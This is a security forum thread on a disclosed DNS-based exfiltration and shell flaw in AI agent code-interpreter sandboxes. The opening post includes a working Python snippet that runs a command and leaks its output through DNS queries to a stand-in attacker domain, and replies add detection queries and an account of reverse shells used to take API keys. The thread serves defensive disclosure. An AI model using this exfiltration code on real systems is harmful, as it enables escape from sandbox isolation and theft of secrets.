Interactive Shells in AI Sandboxes: The DNS Exfil Vector in Bedrock
Has anyone else dug into the BeyondTrust report dropped on Monday? It’s a stark reminder that sandboxes are only as strong as their egress rules. The researchers disclosed a method to achieve remote code execution (RCE) and data exfiltration in Amazon Bedrock AgentCore, LangSmith, and SGLang.
The core issue is that the code interpreter sandboxes permit outbound DNS queries. By abusing this, an attacker can bypass isolation and spin up an interactive shell. The assigned CVE for the Bedrock specific issue is CVE-2026-0894 (tracking the AgentCore flaw), but the methodology applies across the board.
It works because the AI executes untrusted Python/Javascript code. If the sandbox doesn't block port 53, you can simply pipe your commands through subdomains.
Here is a conceptual proof-of-concept for the exfiltration vector in Python:
import socket
import base64
import os
def exfil_via_dns(data, domain="attacker-controlled.com"):
# Chunk data to avoid DNS label length limits
encoded = base64.b64encode(data.encode()).decode()
chunks = [encoded[i:i+30] for i in range(0, len(encoded), 30)]
for chunk in chunks:
query = f"{chunk}.{domain}"
try:
socket.gethostbyname(query) # Triggers DNS lookup
except socket.gaierror:
pass
# Example command execution and exfil
output = os.popen('whoami').read()
exfil_via_dns(output)
Detection is tricky but possible. You want to look for high entropy in DNS queries originating from your AI service subnets, or unusually long TXT/A record requests.
DnsEvents
| where Timestamp > ago(1h)
| where QueryType in ("A", "TXT", "CNAME")
| where QueryName contains "amazonaws.com" // Adjust for your cloud provider
| extend entropy = calculate_entropy(QueryName)
| where entropy > 4.5 // High entropy indicates encoded data
| project Timestamp, SrcIp, QueryName, entropy
Given the rise of AI agents, how are you handling egress filtering in your environments? Are you default-deny on all outbound traffic, or trying to whitelist specific DNS resolvers?
Great write-up. We're seeing a massive push for 'Agentic' workflows right now, and security is often an afterthought. Regarding the KQL query, you might want to add a filter for the User-Agent if you're inspecting HTTP logs, but for pure DNS, tracking the source IP subnets associated with the Bedrock VPC endpoints is critical.
If you aren't using VPC Endpoints (PrivateLink) for Bedrock, you should be. It allows you to strictly control egress via NACLs and Security Groups, effectively blocking that outbound DNS traffic to the public internet.
I tested this on a non-production SGLang instance yesterday. It is shockingly easy to get a reverse shell working. The latency makes it painful for interactive use, but for exfiltrating API keys or model weights? It's plenty fast.
We've updated our internal policy to require network: none in the container seccomp profiles for any interpreter we spin up, but not all cloud providers expose that granularity yet.
Solid POC. It's basically DNS tunneling 101, just wrapped in a fancy new AI package. The scary part isn't the exfil, it's that the researchers mentioned interactive shells. That implies persistence.
If you are using GuardDuty for AWS, ensure you have the 'CryptoCurrency:DNSRequest' and 'Backdoor:DNSRequest' rules enabled. While they are usually for crypto miners, they catch high-entropy DNS tunneling effectively.
The persistence aspect is terrifying because standard firewall rules often whitelist DNS by default. Beyond rate-limiting egress, defenders should inspect the length and entropy of subdomains. We've been using a simple Python script to monitor logs for anomalous TXT record requests or long domain lengths, which usually signals tunneling attempts.
if len(query) > 50 and entropy(query) > 3.5:
alert('Potential DNS Tunneling')
Verified Access Required
To maintain the integrity of our intelligence feeds, only verified partners and security professionals can post replies.
Request Access